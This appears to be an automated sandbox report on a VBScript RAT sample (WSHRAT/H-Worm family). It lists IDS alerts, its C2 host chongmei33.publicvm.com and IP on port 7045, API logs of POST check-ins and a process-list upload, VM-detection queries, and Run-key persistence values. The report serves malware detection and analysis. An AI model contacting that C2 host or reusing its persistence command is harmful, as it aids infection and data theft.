Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Dec. 14, 2023, 10:12 a.m.	Dec. 14, 2023, 10:16 a.m.

Size	257.4KB
Type	Non-ISO extended-ASCII text, with very long lines, with CRLF line terminators
MD5	`4d09dbc70709eb2790c491dc476d508b`
SHA256	`8939bff041d3968fe34dd5ded9c609364d0c5f2989ff60b1703a8c557fe09d84`
CRC32	`46D5322F`
ssdeep	`384:LW0SXuLuL8qCMhqbxOsu4Xpj3Tu88+cIUL87V7yY/DR7g7gDJ1ecYkG3Vd2AjIjt:LW0t3Ifve`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\wp.vbs
2568

Name	Response	Post-Analysis Lookup
chongmei33.publicvm.com	A 103.47.144.44	103.47.144.44

IP Address	Status	Action
103.47.144.44	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49170 -> 103.47.144.44:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49163 -> 103.47.144.44:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 103.47.144.44:7045	2017968	ET HUNTING Suspicious Possible Process Dump in POST body	A Network Trojan was detected
TCP 192.168.56.101:49163 -> 103.47.144.44:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 103.47.144.44:7045	2027117	ET HUNTING Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration	A Network Trojan was detected
TCP 192.168.56.101:49163 -> 103.47.144.44:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49170 -> 103.47.144.44:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49167 -> 103.47.144.44:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49167 -> 103.47.144.44:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49167 -> 103.47.144.44:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49179 -> 103.47.144.44:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49179 -> 103.47.144.44:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49179 -> 103.47.144.44:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49169 -> 103.47.144.44:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 103.47.144.44:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 103.47.144.44:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49181 -> 103.47.144.44:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49181 -> 103.47.144.44:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49181 -> 103.47.144.44:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49171 -> 103.47.144.44:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49183 -> 103.47.144.44:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 103.47.144.44:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49183 -> 103.47.144.44:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49183 -> 103.47.144.44:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49171 -> 103.47.144.44:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 103.47.144.44:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 103.47.144.44:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 103.47.144.44:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49178 -> 103.47.144.44:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49178 -> 103.47.144.44:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49178 -> 103.47.144.44:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49184 -> 103.47.144.44:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49184 -> 103.47.144.44:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49184 -> 103.47.144.44:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
UDP 192.168.56.101:59002 -> 164.124.101.2:53	2034457	ET POLICY Observed DNS Query to DynDNS Domain (publicvm .com)	Potentially Bad Traffic
TCP 192.168.56.101:49165 -> 103.47.144.44:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49165 -> 103.47.144.44:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49165 -> 103.47.144.44:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49168 -> 103.47.144.44:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 103.47.144.44:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 103.47.144.44:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49173 -> 103.47.144.44:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 103.47.144.44:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 103.47.144.44:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49175 -> 103.47.144.44:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49175 -> 103.47.144.44:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49175 -> 103.47.144.44:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49174 -> 103.47.144.44:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49174 -> 103.47.144.44:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49174 -> 103.47.144.44:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 103.47.144.44:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 103.47.144.44:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 103.47.144.44:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 103.47.144.44:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49180 -> 103.47.144.44:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49180 -> 103.47.144.44:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49166 -> 103.47.144.44:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49166 -> 103.47.144.44:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49166 -> 103.47.144.44:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 103.47.144.44:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49177 -> 103.47.144.44:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49177 -> 103.47.144.44:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49182 -> 103.47.144.44:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49182 -> 103.47.144.44:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49182 -> 103.47.144.44:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (50 out of 106 events)

Time & API	Arguments	Status	Return
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:13 a.m.	computer_name: TEST22-PC	1	1

Connects to a Dynamic DNS Domain (1 event)

domain

chongmei33.publicvm.com

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (20 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW Dec. 14, 2023, 10:12 a.m.	number_of_free_clusters: 3252422 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Dec. 14, 2023, 10:12 a.m.	number_of_free_clusters: 3252418 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Dec. 14, 2023, 10:12 a.m.	number_of_free_clusters: 3252404 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Dec. 14, 2023, 10:12 a.m.	number_of_free_clusters: 3252404 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Dec. 14, 2023, 10:12 a.m.	number_of_free_clusters: 3252404 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Dec. 14, 2023, 10:13 a.m.	number_of_free_clusters: 3252404 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Dec. 14, 2023, 10:13 a.m.	number_of_free_clusters: 3252468 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Dec. 14, 2023, 10:13 a.m.	number_of_free_clusters: 1934588 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Dec. 14, 2023, 10:13 a.m.	number_of_free_clusters: 1934588 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Dec. 14, 2023, 10:13 a.m.	number_of_free_clusters: 3252416 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Dec. 14, 2023, 10:13 a.m.	number_of_free_clusters: 3252288 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Dec. 14, 2023, 10:13 a.m.	number_of_free_clusters: 3252288 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Dec. 14, 2023, 10:13 a.m.	number_of_free_clusters: 3252282 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Dec. 14, 2023, 10:13 a.m.	number_of_free_clusters: 3252282 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Dec. 14, 2023, 10:13 a.m.	number_of_free_clusters: 3252282 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Dec. 14, 2023, 10:14 a.m.	number_of_free_clusters: 3252282 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Dec. 14, 2023, 10:14 a.m.	number_of_free_clusters: 3252282 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Dec. 14, 2023, 10:14 a.m.	number_of_free_clusters: 3252282 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Dec. 14, 2023, 10:14 a.m.	number_of_free_clusters: 3252282 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Dec. 14, 2023, 10:14 a.m.	number_of_free_clusters: 3252281 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	select * from win32_logicaldisk

Wscript.exe initiated network communications indicative of a script based payload download (43 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW Dec. 14, 2023, 10:12 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:12 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Dec. 14, 2023, 10:12 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:12 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Dec. 14, 2023, 10:12 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:12 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Dec. 14, 2023, 10:12 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:12 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Dec. 14, 2023, 10:12 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:12 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Dec. 14, 2023, 10:13 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:13 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetReadFile Dec. 14, 2023, 10:13 a.m.	buffer: get-processes request_handle: 0x00cc000c	1	1
InternetCrackUrlW Dec. 14, 2023, 10:13 a.m.	url: http://chongmei33.publicvm.com:7045/is-processes flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:13 a.m.	connect_handle: 0x00cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-processes	1	13369356
InternetCrackUrlW Dec. 14, 2023, 10:13 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:13 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Dec. 14, 2023, 10:13 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:13 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Dec. 14, 2023, 10:13 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:13 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Dec. 14, 2023, 10:13 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:13 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Dec. 14, 2023, 10:13 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:13 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Dec. 14, 2023, 10:13 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:13 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Dec. 14, 2023, 10:13 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:13 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Dec. 14, 2023, 10:13 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:13 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Dec. 14, 2023, 10:13 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:13 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Dec. 14, 2023, 10:14 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:14 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Dec. 14, 2023, 10:14 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:14 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Dec. 14, 2023, 10:14 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:14 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Dec. 14, 2023, 10:14 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:14 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Dec. 14, 2023, 10:14 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:14 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356

Installs itself for autorun at Windows startup (42 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
